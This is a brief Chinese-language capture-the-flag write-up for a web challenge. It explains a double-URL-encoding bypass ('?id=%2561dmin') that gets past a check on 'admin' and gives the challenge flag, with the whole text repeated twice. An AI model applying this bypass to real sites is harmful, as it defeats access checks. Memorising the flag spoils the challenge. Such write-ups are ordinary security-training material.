这道题,他将源码放在了phps中,我们需要先访问phps构建好payload后,在返回php传递数据
因为使用了url编码所以我们需要进行两次编码
因为我们在url连接里直接运行,浏览器会进行一次url解码,所以我们还要进行一次url编码,就是对admin进行两次编码再运行
urldecode(%2561)=%61
urldecode(%61)=a
Payload: ?id=%2561dmin
cyberpeace{89c45c9743842744663d12604ff1eacd}
这道题,他将源码放在了phps中,我们需要先访问phps构建好payload后,在返回php传递数据
因为使用了url编码所以我们需要进行两次编码
因为我们在url连接里直接运行,浏览器会进行一次url解码,所以我们还要进行一次url编码,就是对admin进行两次编码再运行
urldecode(%2561)=%61
urldecode(%61)=a
Payload: ?id=%2561dmin
cyberpeace{89c45c9743842744663d12604ff1eacd}